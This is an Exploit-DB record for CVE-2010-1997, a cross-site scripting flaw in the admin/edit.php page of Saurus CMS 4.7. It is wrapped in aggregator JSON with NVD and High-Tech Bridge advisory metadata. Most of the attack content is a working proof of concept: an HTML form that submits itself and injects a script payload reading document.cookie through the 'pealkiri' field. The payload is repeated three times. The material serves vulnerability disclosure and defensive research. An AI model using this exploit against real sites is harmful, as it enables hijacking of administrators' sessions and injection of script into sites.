ID EDB-ID:33976
Type exploitdb
Reporter High-Tech Bridge SA
Modified 2010-05-11T00:00:00
Description
Saurus CMS 4.7 'edit.php' Cross Site Scripting Vulnerability. CVE-2010-1997. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/40059/info
Saurus CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Saurus CMS 4.7.0 Community Edition is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin/edit.php" name="editForm" method="POST" enctype="multipart/form-data">
<input type="hidden" name="tab" value="object" />
<input type="hidden" name="op" value="new" />
<input type="hidden" name="op2" value="" />
<input type="hidden" name="refresh" value="0" />
<input type="hidden" name="tyyp_id" value="1" />
<input type="hidden" name="tyyp" value="rubriik" />
<input type="hidden" name="pearubriik" value="0" />
<input type="hidden" name="id" value="27746" />
<input type="hidden" name="parent_id" value="27270" />
<input type="hidden" name="previous_id" value="" />
<input type="hidden" name="keel" value="1" />
<input type="hidden" name="on_pealkiri" value="1" />
<input type="hidden" name="sorting" value="">
<input type="hidden" name="extension_path" value="" />
<input type="hidden" name="opener_location" value="" />
<input type="hidden" name="publish" value="1" />
<input name="permanent_parent_id" type="hidden" value="27270" />
<input name="sys_alias" type="hidden" value="" />
<input name="advanced_panel_state" type="hidden" value="0" />
<input type="hidden" name="pealkiri" value='"><script>alert(document.cookie)</script>' />
<input type="hidden" name="friendly_url" value="scriptalertdocumentcookiescript" />
<input type="hidden" name="ttyyp_id" value="0" />
<input type="hidden" name="publish" value="1" />
<input type="hidden" name="rubriik[]" value="27270">
<input type="hidden" name="page_ttyyp_id" value="0" />
<input type="hidden" name="on_meilinglist" value="1" />
<input type="hidden" name="avaldamise_algus" value="" />
<input type="hidden" name="avaldamise_lopp" value="" />
<input type="hidden" name="kesk" value="0" />
</form>
<script>
document.editForm.submit();
</script>
{"id": "EDB-ID:33976", "hash": "0ab2b53b0c86ada4a09abbb93bf8d27a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting Vulnerability", "description": "Saurus CMS 4.7 'edit.php' Cross Site Scripting Vulnerability. CVE-2010-1997. Webapps exploit for php platform", "published": "2010-05-11T00:00:00", "modified": "2010-05-11T00:00:00", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/33976/", "reporter": "High-Tech Bridge SA", "references": [], "cvelist": ["CVE-2010-1997"], "lastseen": "2016-02-03T20:14:08", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2016-02-03T20:14:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1997"]}, {"type": "htbridge", "idList": ["HTB22361"]}], "modified": "2016-02-03T20:14:08"}, "vulnersScore": 4.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33976/", "sourceData": "source: http://www.securityfocus.com/bid/40059/info\r\n\r\nSaurus CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\r\n\r\nSaurus CMS 4.7.0 Community Edition is vulnerable; other versions may also be affected. \r\n\r\n<form action=\"http://www.example.com/admin/edit.php\" name=\"editForm\" method=\"POST\" enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"tab\" value=\"object\" />\r\n<input type=\"hidden\" name=\"op\" value=\"new\" />\r\n<input type=\"hidden\" name=\"op2\" value=\"\" />\r\n<input type=\"hidden\" name=\"refresh\" value=\"0\" />\r\n<input type=\"hidden\" name=\"tyyp_id\" value=\"1\" />\r\n<input type=\"hidden\" name=\"tyyp\" value=\"rubriik\" />\r\n<input type=\"hidden\" name=\"pearubriik\" value=\"0\" />\r\n<input type=\"hidden\" name=\"id\" value=\"27746\" />\r\n<input type=\"hidden\" name=\"parent_id\" value=\"27270\" />\r\n<input type=\"hidden\" name=\"previous_id\" value=\"\" />\r\n<input type=\"hidden\" name=\"keel\" value=\"1\" />\r\n<input type=\"hidden\" name=\"on_pealkiri\" value=\"1\" />\r\n<input type=\"hidden\" name=\"sorting\" value=\"\">\r\n<input type=\"hidden\" name=\"extension_path\" value=\"\" />\r\n<input type=\"hidden\" name=\"opener_location\" value=\"\" />\r\n<input type=\"hidden\" name=\"publish\" value=\"1\" />\r\n<input name=\"permanent_parent_id\" type=\"hidden\" value=\"27270\" />\r\n<input name=\"sys_alias\" type=\"hidden\" value=\"\" />\r\n<input name=\"advanced_panel_state\" type=\"hidden\" value=\"0\" />\r\n<input type=\"hidden\" name=\"pealkiri\" value='\"><script>alert(document.cookie)</script>' />\r\n<input type=\"hidden\" name=\"friendly_url\" value=\"scriptalertdocumentcookiescript\" />\r\n<input type=\"hidden\" name=\"ttyyp_id\" value=\"0\" />\r\n<input type=\"hidden\" name=\"publish\" value=\"1\" />\r\n<input type=\"hidden\" name=\"rubriik[]\" value=\"27270\">\r\n<input type=\"hidden\" name=\"page_ttyyp_id\" value=\"0\" />\r\n<input type=\"hidden\" name=\"on_meilinglist\" value=\"1\" />\r\n<input type=\"hidden\" name=\"avaldamise_algus\" value=\"\" />\r\n<input type=\"hidden\" name=\"avaldamise_lopp\" value=\"\" />\r\n<input type=\"hidden\" name=\"kesk\" value=\"0\" />\r\n</form>\r\n<script>\r\ndocument.editForm.submit();\r\n</script>\r\n\r\n\r\n", "osvdbidlist": ["64570"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:28", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in admin/edit.php in Saurus CMS 4.7.0 allows remote authenticated users, with \"Article list\" edit privileges, to inject arbitrary web script or HTML via the pealkiri parameter.", "modified": "2018-10-10T19:58:00", "id": "CVE-2010-1997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1997", "published": "2010-05-20T17:30:00", "title": "CVE-2010-1997", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:N/AC:H/Au:S/C:N/I:P/A:N"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:29", "bulletinFamily": "software", "description": "High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Saurus CMS which could be exploited to perform cross-site scripting (XSS) attacks. \n \n1) Cross-site scripting vulnerability in Saurus CMS: CVE-2010-1997 \nThe vulnerability exists due to insufficient input sanitation in the HTTP POST parameter \"pealkiri\" in /admin/edit.php. A remote attacker can create a specially crafted page and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged in and has \"Article list\" edit privileges. \nExploitation example: \n<form action=\"http://host/admin/edit.php\" name=\"editForm\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"hidden\" name=\"tab\" value=\"object\" /> \n<input type=\"hidden\" name=\"op\" value=\"new\" /> \n<input type=\"hidden\" name=\"op2\" value=\"\" /> \n<input type=\"hidden\" name=\"refresh\" value=\"0\" /> \n<input type=\"hidden\" name=\"tyyp_id\" value=\"1\" /> \n<input type=\"hidden\" name=\"tyyp\" value=\"rubriik\" /> \n<input type=\"hidden\" name=\"pearubriik\" value=\"0\" /> \n<input type=\"hidden\" name=\"id\" value=\"27746\" /> \n<input type=\"hidden\" name=\"parent_id\" value=\"27270\" /> \n<input type=\"hidden\" name=\"previous_id\" value=\"\" /> \n<input type=\"hidden\" name=\"keel\" value=\"1\" /> \n<input type=\"hidden\" name=\"on_pealkiri\" value=\"1\" /> \n<input type=\"hidden\" name=\"sorting\" value=\"\"> \n<input type=\"hidden\" name=\"extension_path\" value=\"\" /> \n<input type=\"hidden\" name=\"opener_location\" value=\"\" /> \n<input type=\"hidden\" name=\"publish\" value=\"1\" /> \n<input name=\"permanent_parent_id\" type=\"hidden\" value=\"27270\" /> \n<input name=\"sys_alias\" type=\"hidden\" value=\"\" /> \n<input name=\"advanced_panel_state\" type=\"hidden\" value=\"0\" /> \n<input type=\"hidden\" name=\"pealkiri\" value='\"><script>alert(document.cookie)</script>' /> \n<input type=\"hidden\" name=\"friendly_url\" value=\"scriptalertdocumentcookiescript\" /> \n<input type=\"hidden\" name=\"ttyyp_id\" value=\"0\" /> \n<input type=\"hidden\" name=\"publish\" value=\"1\" /> \n<input type=\"hidden\" name=\"rubriik[]\" value=\"27270\"> \n<input type=\"hidden\" name=\"page_ttyyp_id\" value=\"0\" /> \n<input type=\"hidden\" name=\"on_meilinglist\" value=\"1\" /> \n<input type=\"hidden\" name=\"avaldamise_algus\" value=\"\" /> \n<input type=\"hidden\" name=\"avaldamise_lopp\" value=\"\" /> \n<input type=\"hidden\" name=\"kesk\" value=\"0\" /> \n</form> \n<script> \ndocument.editForm.submit(); \n</script>\n", "modified": "2010-04-27T00:00:00", "published": "2010-04-27T00:00:00", "id": "HTB22361", "href": "https://www.htbridge.com/advisory/HTB22361", "type": "htbridge", "title": "Cross-site Scripting (XSS) in Saurus CMS", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}]}
